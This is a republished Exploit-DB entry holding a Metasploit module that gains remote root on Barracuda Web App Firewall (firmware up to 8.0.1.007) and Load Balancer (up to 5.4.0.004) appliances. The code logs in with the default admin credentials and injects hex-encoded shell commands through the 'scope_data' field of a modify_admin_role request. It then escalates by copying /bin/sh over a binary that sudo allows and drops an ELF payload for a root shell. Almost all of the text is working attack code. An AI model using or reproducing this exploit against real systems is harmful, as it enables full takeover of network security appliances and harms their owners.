Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 – Remote Command Execution (Metasploit)

  • 作者: xort
    日期: 2016-07-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/40146/
  • # Exploit Title: Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit
    # Date: 07/21/16
    # Exploit Author: xort xort@blacksecurity.org 
    # Vendor Homepage: https://www.barracuda.com/
    # Software Link: https://www.barracuda.com/products/loadbalance & https://www.barracuda.com/products/webapplicationfirewall
    # Version: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07)
    # Tested on: Load Balancer Firmware <= v5.4.0.004 (2015-11-26) & Web App Firewall Firmware <= 8.0.1.007 (2016-01-07) 
    # CVE : None.
    
    
    # vuln: ondefine_modify_admin_role trigger exploit
    
    require 'msf/core'
    
    class MetasploitModule < Msf::Exploit::Remote
    	Rank = ExcellentRanking
    	includeExploit::Remote::Tcp
    include Msf::Exploit::Remote::HttpClient
    
    	def initialize(info = {})
    		super(update_info(info,
    			'Name' => 'Barracuda Web App Firewall/Load Balancer Post Auth Remote Root Exploit',
    			'Description'=> %q{
    					This module exploits a remote command execution vulnerability in
    				the Barracuda Web App Firewall Firmware Version <= 8.0.1.007 and Load Balancer Firmware <= v5.4.0.004
    				by exploiting a vulnerability in the web administration interface. By sending a specially crafted request 
    				it's possible to inject system commands while escalating to root do to relaxed sudo configurations on the applianaces.
    			},
    			'Author' =>
    				[
    					'xort', # vuln + metasploit module
    				],
    			'Version'=> '$Revision: 2 $',
    			'References' =>
    				[
    					[ 'none', 'none'],
    				],
    			'Platform'=> [ 'linux'],
    			'Privileged' => true,
    			 'Arch'=> [ ARCH_X86 ],
    'SessionTypes'=> [ 'shell' ],
    'Privileged' => false,
    
    		'Payload'=>
    { 
    'Compat' =>
    {
    'ConnectionType' => 'find',
    }
    },
    
    			'Targets'=>
    				[
    					['Barracuda Web App Firewall Firmware Version <= 8.0.1.007 (2016-01-07)',
    						{
    								'Arch' => ARCH_X86,
    								'Platform' => 'linux',
    								'SudoCmdExec' => "/home/product/code/firmware/current/bin/config_agent_wrapper.pl"
    						}
    					],
    
    					['Barracuda Load Balancer Firmware <= v5.4.0.004 (2015-11-26)',
    						{
    								'Arch' => ARCH_X86,
    								'Platform' => 'linux',
    								'SudoCmdExec' => "/home/product/code/firmware/current/bin/rdpd"
    						}
    					],
    				],
    			'DefaultTarget' => 0))
    
    			register_options(
    				[
    					OptString.new('PASSWORD', [ false, 'Device password', "" ]),	
    					OptString.new('ET', [ false, 'Device password', "" ]),
    			 	OptString.new('USERNAME', [ true, 'Device password', "admin" ]),	
    					OptString.new('CMD', [ false, 'Command to execute', "" ]),	
    					Opt::RPORT(8000),
    				], self.class)
    	end
    
    def do_login(username, password_clear, et)
    vprint_status( "Logging into machine with credentials...\n" )
    
    # vars
    timeout = 1550;
    enc_key = Rex::Text.rand_text_hex(32)
    
    # send request
    res = send_request_cgi(
    {
    'method'=> 'POST',
    'uri' => "/cgi-mod/index.cgi",
    		'headers' => 
    			{
    				'Accept' => "application/json, text/javascript, */*; q=0.01",
    				'Content-Type' => "application/x-www-form-urlencoded",
    				'X-Requested-With' => "XMLHttpRequest"
    			},
    'vars_post' =>
    {
    
    'enc_key' => enc_key,
    'et' => et,
    'user' => "admin", # username,
    'password' => "admin", # password_clear,
    'enctype' => "none",
    'password_entry' => "",
    			'login_page' => "1",
    'login_state' => "out",
    'real_user' => "",
    'locale' => "en_US",
    'form' => "f",
    'Submit' => "Sign in",
    }
    }, timeout)
    
    # get rid of first yank 
    password = res.body.split('\n').grep(/(.*)password=([^&]+)&/){$2}[0] #change to match below for more exact result
    et = res.body.split('\n').grep(/(.*)et=([^&]+)&/){$2}[0]
    
    return password, et
    end
    
    	def run_command(username, password, et, cmd)
    		vprint_status( "Running Command...\n" )
    
    		sudo_cmd_exec = target.SudoCmdExec
    
    sudo_run_cmd_1 = "sudo /bin/cp /bin/sh #{sudo_cmd_exec} ; sudo /bin/chmod +x #{sudo_cmd_exec}"
    sudo_run_cmd_2 = "sudo #{sudo_cmd_exec} -c "
    
    # random filename to dump too + 'tmp' HAS to be here.
    dumpfile = "/tmp/" + rand_text_alphanumeric(4+rand(4))
    
    		encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
    
    		injection_string = "printf \"#{encoded_cmd}\" > #{dumpfile} ; /bin/chmod +x #{dumpfile} ; #{sudo_run_cmd_1} ; #{sudo_run_cmd_2} #{dumpfile} ; rm #{dumpfile}" 
    
    	 	exploitreq = [
    		[ "auth_type","Local" ],
    		[ "et",et ],
    		[ "locale","en_US" ],
    		[ "password", password],
    		[ "primary_tab", "BASIC" ],
    		[ "realm","" ],
    		[ "secondary_tab","reports" ],
    		[ "user", username ],
    		[ "timestamp", Time.now.to_i ],
    		
    		[ "scope", "" ],
    		[ "scope_data", "; #{injection_string} ;" ], # vuln
    		[ "modify_admin_role", "" ] 
    
    		]
    
    		
    		boundary = "---------------------------" + Rex::Text.rand_text_numeric(34)
    
    		post_data = ""
    	
    		exploitreq.each do |xreq|
    		post_data << "--#{boundary}\r\n"
    		post_data << "Content-Disposition: form-data; name=\"#{xreq[0]}\"\r\n\r\n"
    		post_data << "#{xreq[1]}\r\n"
    		end
    		post_data << "--#{boundary}--\r\n"
    
    	res = send_request_cgi({
     	 'method' => 'POST',
    	 'uri'=> "/cgi-mod/index.cgi",
     		 'ctype'=> "multipart/form-data; boundary=#{boundary}",
    	 'data' => post_data,
    		 'headers' => 
    			{
    				'UserAgent' => "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0",
    				'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    				'Accept-Language' => "en-US,en;q=0.5"
    			}
    	})	
    
    	end
    
    	def run_script(username, password, et, cmds)
    		vprint_status( "running script...\n")
    	
    	
    	end
    	
    	def exploit
    		# timeout
    		timeout = 1550;
    
    		user = "admin"
    		
    		# params
    real_user = "";
    		login_state = "out"
    		et = Time.now.to_i
    		locale = "en_US"
    		user = "admin"
    		password = "admin"
    		enctype = "MD5"
    		password_entry = ""
    		password_clear = "admin"
    		
    
    		password_hash, et = do_login(user, password_clear, et)
    		vprint_status("new password: #{password_hash} et: #{et}\n")
    
    		sleep(5)
    
    
    		# if no 'CMD' string - add code for root shell
    if not datastore['CMD'].nil? and not datastore['CMD'].empty?
    
    cmd = datastore['CMD']
    
    # Encode cmd payload
    encoded_cmd = cmd.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
    
    # kill stale calls to bdump from previous exploit calls for re-use
    run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/n ;printf \"#{encoded_cmd}\" > /tmp/n; chmod +rx /tmp/n ; /tmp/n" ))
    else
    # Encode payload to ELF file for deployment
    elf = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
    encoded_elf = elf.unpack("H*").join().gsub(/(\w)(\w)/,'\\x\1\2')
    
    # kill stale calls to bdump from previous exploit calls for re-use
    run_command(user, password_hash, et, ("sudo /bin/rm -f /tmp/m ;printf \"#{encoded_elf}\" > /tmp/m; chmod +rx /tmp/m ; /tmp/m" ))
    
    handler
    end
    
    
    	end
    
    end